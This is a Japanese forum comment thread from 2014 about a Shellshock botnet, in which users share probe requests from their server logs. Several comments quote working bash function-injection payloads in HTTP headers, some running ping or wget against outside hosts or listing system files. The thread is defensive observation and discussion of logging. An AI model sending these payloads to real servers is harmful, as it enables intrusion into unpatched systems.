早速shodanが探り入れてきてます？ (#2683778) | bashのShellshock脆弱性を利用するボットネットが出現

「bashのShellshock脆弱性を利用するボットネットが出現」記事へのコメント

記事ページを表示すべてのコメント取得

検索69コメント Log In/Create an Account

早速shodanが探り入れてきてます？ (スコア:3, 参考になる)

by Anonymous Coward on 2014年09月27日 17時10分 (#2683778)

198.20.69.74（census1.shodan.io)から、
GET / HTTP/1.1
Cookie: () { :; }; /bin/ping -c 1 104.131.0.69
Referer: () { :; }; /bin/ping -c 1 104.131.0.69
User-agent: () { :; }; /bin/ping -c 1 104.131.0.69
などというのがきてます。
104.131.0.69は　hello.data.shodan.io　だそうです。
ちなみに
census1.shodan.io 198.20.69.74
census2.shodan.io 198.20.69.98
census3.shodan.io 198.20.70.114
census4.shodan.io 198.20.99.130
census5.shodan.io 93.120.27.62
census6.shodan.io 66.240.236.119
census7.shodan.io 71.6.135.131
census8.shodan.io 66.240.192.138
census9.shodan.io 71.6.167.142
census10.shodan.io 82.221.105.6
census11.shodan.io 82.221.105.7
census12.shodan.io 71.6.165.200
census.shodan.io 208.180.20.97
- Re:早速shodanが探り入れてきてます？ (スコア:1)
  
  by Anonymous Coward on 2014年09月28日 1時07分 (#2683951)
  
  我が家のapacheでgrep '()' access_logしたら昨日の時点でもかなりのアクセスが見つかりました
  確認しているだけで
  () { :;}; wget 'http://taxiairportpop.com/s.php?s=http://example.com/'
  () { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://exmaple.com/ [dipad.biz]\"
  () { :;};echo Content-type:text/plain;echo;/bin/ls /etc/resolv.conf;exit
  () { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit
  () { :; }; echo Mozilla: `echo K3Vbs0di2P`
  などなどいろんなパターンがありますね
  
  シェア
  
  親コメント
- Re: (スコア:0)
  
  by Anonymous Coward
  
  なるほど。その手の変数名をつかうと、より効果的に攻撃出来るんですね。
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    変数名というか、これらのリクエストヘッダの内容を環境変数に置く様なサーバーの場合に、pingが送られてバレるってことですね。
    
    Apacheのmod_envとか、Appサーバーとの連携で環境変数つかってたりするのも狙われるわけだ。
    
    なるほど、こういう攻撃方法を考えつくわけか…。
- Re: (スコア:0)
  
  by Anonymous Coward
  
  全ヘッダのログを取るには、mod_log_forensic使わないとだめなのか。　環境変数が何でもよいというのは痛いなぁ。
  http://httpd.apache.org/docs/2.4/mod/mod_log_forensic.html [apache.org]

より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。

bashのShellshock脆弱性を利用するボットネットが出現 More ログイン

「bashのShellshock脆弱性を利用するボットネットが出現」記事へのコメント

早速shodanが探り入れてきてます？ (スコア:3, 参考になる)

Re:早速shodanが探り入れてきてます？ (スコア:1)

Re: (スコア:0)

Re: (スコア:0)

Re: (スコア:0)

スラド